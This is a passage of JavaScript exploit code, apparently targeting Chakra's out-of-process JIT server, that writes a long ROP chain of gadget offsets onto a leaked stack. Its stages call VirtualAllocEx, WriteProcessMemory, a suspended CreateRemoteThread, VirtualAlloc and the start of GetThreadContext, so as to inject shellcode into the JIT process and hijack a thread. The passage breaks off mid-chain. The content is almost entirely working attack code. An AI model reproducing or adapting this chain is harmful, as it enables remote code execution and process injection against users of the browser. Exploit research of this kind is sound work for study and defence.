write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx decide where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                                        // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return value (the address of the allocation) in the .data section of kernelbase.dll (It is currently in RAX)

/*
0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for the gadget below, which reads from [rdx+0x08])
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// LPTHREAD_START_ROUTINE lpStartAddress (R9)
// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);      // 0x18028b4fe: Anything we want - this will never get executed
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();

// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)
next();

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)
next();

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)
next();

// WriteProcessMemory() ROP chain (Number 2)
// Stage 5 -> Update the final ROP chain, currently in the chakra.dll .data section, with the address of our shellcode in the pop rcx gadget for lpAddress

// First, we need to preserve the thread HANDLE returned by CreateRemoteThread (it is currently in RAX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the thread HANDLE for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process pseudo-handle (-1)
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the address of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain (Number 3)
// Stage 6 -> Update the final ROP chain, currently in the chakra.dll .data section, with the address of our shellcode in the pop rdi gadget for our "fake return address"

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process pseudo-handle (-1)
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetTwo, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the address of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// VirtualAlloc() ROP chain
// Stage 7 -> Allocate some local memory to store the CONTEXT structure from GetThreadContext

// DWORD flProtect (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // PAGE_READWRITE (0x4)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// LPVOID lpAddress (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (let VirtualAlloc() decide the address)
next();

// SIZE_T dwSize (RDX) (0x4d0 = sizeof(CONTEXT))
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x000004d0, 0x00000000);             // (0x4d0 bytes)
next();

// DWORD flAllocationType (R8) (MEM_RESERVE | MEM_COMMIT = 0x3000)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT (0x3000)
next();

// Call KERNELBASE!VirtualAlloc
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x5ac10, kernelbaseHigh); // KERNELBASE!VirtualAlloc address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAlloc)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAlloc - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();

// GetThreadContext() ROP chain
// Stage 8 -> Dump the registers of our newly created thread within the JIT process to leak the stack

// First, let's store some needed offsets of our VirtualAlloc allocation, as well as the address itself, in the .data section of kernelbase.dll
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108, kernelbaseHigh); // .data section of kernelbase.dll where we will store the VirtualAlloc allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// Save VirtualAlloc_allocation+0x30, which is the address of ContextFlags within our buffer (the CONTEXT structure)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we will store the address of CONTEXT.ContextFlags
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// We need to set CONTEXT.ContextFlags. This address (0x30 offset from CONTEXT buffer allocated from VirtualAlloc) is in kernelbase+0x21a110
// The value we need to set is 0x10001F
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll with CONTEXT.ContextFlags address
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future mov qword [rax+0x20], rcx gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x0010001F, 0x00000000);             // CONTEXT_ALL
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// HANDLE hThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
